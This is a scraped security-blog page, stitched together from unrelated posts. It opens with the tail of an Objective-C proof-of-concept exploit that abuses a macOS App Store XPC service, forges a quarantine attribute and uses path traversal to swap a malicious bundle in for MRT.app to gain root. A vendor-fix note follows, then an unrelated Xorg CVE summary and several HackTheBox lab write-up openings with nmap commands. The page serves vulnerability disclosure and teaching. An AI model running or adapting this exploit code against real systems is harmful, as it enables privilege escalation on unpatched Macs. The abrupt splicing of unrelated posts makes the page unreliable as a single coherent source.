NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
        }];
    }];
}];

Fix

Apple has pushed out a fix in the macOS 11.4 release. They implemented all three of the recommended changes:

  1. The entitlements of the process initiating the connection to StorePrivilegedTaskService are now checked.
  2. The sandboxing profile of StorePrivilegedTaskService was tightened.
  3. The path traversal vulnerabilities in the subdirectory checks were fixed.

This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.


  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed!

Xorg LPE CVE-2018-14665

On October 25th, 2018 a post was made on SecurityTracker disclosing CVE-2018-14665. The interesting thing is that this CVE covers two bugs in two different arguments. The first is a flaw in the -modulepath argument which could lead to arbitrary code execution. The second is a flaw in the -logfile argument which could allow arbitrary files to be deleted from the system. Both of these issues were caused by poor command-line validation.

HackTheBox - Legacy Writeup

Introduction This is a writeup for the machine “Legacy” (10.10.10.4) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring and practicing pen-testers can hone their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command: nmap -sV -sC -Pn -oX /tmp/webmap/legacy.xml 10.10.10.4. If you’re wondering about the last flag, -oX outputs the report in XML format; I use webmap (hence the /tmp/webmap path), an awesome tool that gives me some visual aids for a box/network!

HackTheBox - Lame Writeup

Introduction This is a writeup for the machine “Lame” (10.10.10.3) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring and practicing pen-testers can hone their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command: nmap -sV -sC -Pn -oX /tmp/webmap/lame.xml 10.10.10.3. If you’re wondering about the last flag, -oX outputs the report in XML format; I use webmap (hence the /tmp/webmap path), an awesome tool that gives me some visual aids for a box/network!

HackTheBox - Devel Writeup

Introduction This is a writeup for the machine “Devel” (10.10.10.5) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring and practicing pen-testers can hone their hacking skills in a variety of different scenarios. Enumeration NMAP As usual we’re going to start off with our two nmap scans: a full TCP scan using nmap -sV -sC -p- 10.10.10.5 and a UDP scan using nmap -sU -p- 10.10.10.5. In this case only TCP returned open ports, so we’re going to look at that now.

HackTheBox - Cronos Writeup

Introduction This is a writeup for the machine “Cronos” (10.10.10.13) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring and practicing pen-testers can hone their hacking skills in a variety of different scenarios. Enumeration NMAP Let’s start off with our two nmap scans, a full TCP and a full UDP. In this case only our TCP scan returned any results, so we’re only going to analyse the output of the TCP scan.

HackTheBox - Bashed Writeup

Introduction This is a writeup for the machine “Bashed” (10.10.10.68) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring and practicing pen-testers can hone their hacking skills in a variety of different scenarios. Enumeration NMAP We start off with our two nmap scans, TCP and UDP; however, in this box’s case we only got information back on TCP, so we will only analyse the output of the TCP scan in this post.

HackTheBox - Beep Writeup

Introduction This is a writeup for the machine “Beep” (10.10.10.7) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring and practicing pen-testers can hone their hacking skills in a variety of different scenarios. Enumeration NMAP As always we start off with our full TCP port scan using NMAP; this box is running quite a lot of services, but don’t let that scare you! We follow the same enumeration process, so let’s not worry that it’s any different just because there are more ports!